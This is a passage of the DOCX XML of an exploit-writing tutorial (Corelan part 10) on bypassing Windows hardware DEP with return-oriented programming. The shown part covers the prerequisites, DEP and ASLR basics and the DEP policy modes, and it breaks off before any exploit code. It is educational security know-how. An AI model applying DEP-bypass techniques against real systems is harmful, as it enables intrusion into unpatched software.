        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "questions"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Questions ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "thanks"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Thanks to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="Introduction"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="142875" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1533525" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="2" name="Image2"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a:hlinkClick r:id="rId5"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1533525" cy="1190625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">About 3 months after finishing my previous </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>exploit writing related tutorial</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>, I finally found some time and fresh energy to start writing a new article.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">In the previous tutorials, I have explained the basics of stack based overflows and how they can lead to arbitrary code execution.  I discussed </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>direct RET overflows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>SEH based exploits</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Unicode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>other character restrictions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, the use of </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>debugger plugins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to speed up exploit development, how to </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>bypass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> common memory protection mechanisms and how to </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>write your own shellcode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">While the first tutorials were really written to allow people to learn the basics about exploit development, starting from scratch (basically targeting people who don’t have any knowledge about exploit development), you have most likely discovered that the more recent tutorials continue to build on those basics and require solid knowledge of </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>asm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>creative</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>thinking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>, and some experience with exploit writing in general.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Today’s tutorial is no different. I will continue to build upon everything we have seen and learned in the previous tutorials. This has a couple of consequences :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You really need to master stack based overflow exploitation techniques (direct RET, SEH,etc).  I will assume that you do. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You need to have *some* asm knowledge. Don’t worry. Even if your knowledge is limited to being able to understand what certain instructions do, you’ll probably understand this tutorial. But when you want to build your own rop exploits / apply the rop techniques yourself, you will need to be able to write asm / recognize asm instructions when you need to do a specific task.  In a way, and to a certain extent, you can compare writing a rop chain with writing generic shellcode, so I guess that the required level of asm you should have. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You need to know how to work with Immunity Debugger. Setting breakpoints, stepping through instructions, modifying values in registers and on the stack. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You need to know how the stack works, how data can be put on the stack, taken from the stack, how registers work and how you can interact with registers and the stack in general.  This is really necessary before starting to do ROP. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">If you don’t master the basics of stack based exploiting, then this document is not for you. I will try to explain and to document all steps as good as I can, but in order to avoid ending up with an extremely lengthy document, I will have to assume you know how stack based overflows work and can be exploited. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>article 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> of the tutorial series, I have explained some techniques to bypass memory protection systems.   Today, I’ll elaborate more on one of these protection mechanisms, called DEP.  (To be more specific, I’ll talk about Hardware DEP (NX/XD) and how we can bypass it)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As you can read in tutorial 6, there are 2 major kinds of protection mechanisms… First of all, there are plenty of techniques that can be put in place by the developer (secure coding, stack cookies, safeseh, etc). Most compilers and linkers nowadays enable most of those features by default (except for "secure coding", which is not a feature of course), and that is a good thing. Sadly enough, there are still a horrible amount of applications out there that are not protected and will rely on other protection mechanisms. And I think you will agree that there are still a lot of developers who don’t apply secure coding principles to all their code. On top of that (which makes things even worse), some developers start to rely on OS protection mechanisms (see next), and just don’t even care about secure coding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>That brings us to a second layer of protections, which are part of all recent versions of the Windows operating system : ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ASLR will randomize stack, heap, module base addresses, making it hard to "predict" (and thus hardcode) addresses/memory locations, consequently making it hard(er) for hackers to build reliable exploits. DEP (I am referring to hardware DEP in this tutorial) will basically prevent code to be executed on the stack (which is what we have done in all previous tutorials).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The combination of ASLR and DEP have been proven to be quite effective in most cases (but, as you will learn today, can still be bypassed under certain circumstances).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In short, application bugs/buffer overflows won’t auto magically disappear, will probably never disappear, and compiler/linker protections are still not applied to all modules, all the time. That means that ASLR and DEP are our "last resort" layer of defense.  ASLR and DEP are now part of all recent OS’es, so it’s a natural evolution to see that attacking/bypassing these 2 protection mechanisms have become significant targets for hackers and researchers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The technique that will be used to bypass DEP in this tutorial is not a new technique. It is very much based on the concept of ret-to-libc / code reuse and was (re)branded to "ROP", short for "Return Oriented Programming".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>I already discussed the concept of ret-to-libc in tutorial 6, and in fact, the NtSetInformationProcess technique explain in tutorial 6 is an example of ROP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Over the last year/months, new vectors, new ways to use ROP to bypass DEP were documented.  What this tutorial does is simply gather all that information and explain how they can be used to bypass DEP on Win32 systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Before looking at what DEP is, and how to bypass it, there is one very important thing to keep in mind :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In all previous tutorials, our shellcode (including alignment code etc) has been placed somewhere on the stack or heap, and we have tried to build reliable ways to jump to that code and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With hardware DEP enabled, you cannot execute a single instruction on the stack.  You can still push and pop data onto/from the stack, but you cannot jump to the stack/execute code. Not without bypassing/disabling DEP first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Keep that in mind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="hwdep"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
        <w:t>Hardware DEP in the Win32 world</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Hardware DEP takes advantage of the NX ("No Execute page protection", AMD specification) or XD ("Execute Disable", Intel specification) bit on DEP compatible CPU’s, and will mark certain parts of the memory (which should only contain data, such as the default heap, stack, memory pools) as non-executable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When an attempt is made to execute code from a DEP protected data page, an access violation (STATUS_ACCESS_VIOLATION (0xc0000005)) will occur. In most cases, this will result in process termination (unhandled exception).  As a result of this, when a developer decided he wants to allow code to run from a certain memory page, he will have to allocate the memory and mark it as executable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Support for hardware DEP was introduced in Windows XP SP2 and Windows Server 2003 SP1 and is now part of all versions of the Windows operating system since those 2 versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>DEP functions on a per-virtual memory page basis and will change a bit in the PTE (Page Table Entry) to mark the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order for the OS to use this feature, the processor must be running in PAE mode (Physical Address Extension).  Luckily, Windows will enable PAE by default.  (64bit systems are "Address Windowing Extensions" (AWE) aware, so no need to have a separate PAE kernel in 64 bit either)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The way DEP manifests itself within the Windows operating system is based on a setting which can be configured to one of the following values :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>OptIn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> : Only a limited set of Windows system modules/binaries are protected by DEP. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>OptOut</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> : All programs, processes, services on the Windows system are protected, except for processes in the exception list </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>AlwaysOn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> : All programs, processes, services, etc on the Windows system are protected. No exceptions </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>AlwaysOff</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> : DEP is turned off. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In addition to those 4 modes, MS implemented a mechanism called "Permanent DEP", which uses SetProcessDEPPolicy(PROCESS_DEP_ENABLE) to make sure processes are DEP enabled.  On Vista (and later), this "permanent" flag is automatically set for all executables that were linked with the /NXCOMPAT option.  When the flag is set, then changing the DEP policy for that executable *might* only be possible using the SetProcessDEPPolicy technique (see later).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You can find more information about SetProcessDEPPolicy </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The default settings for the various versions of the Windows operating system are :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Windows XP SP2, XP SP3, Vista SP0 : OptIn </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Windows Vista SP1 : OptIn + Permanent DEP </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Windows 7: OptIn  + Permanent DEP </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
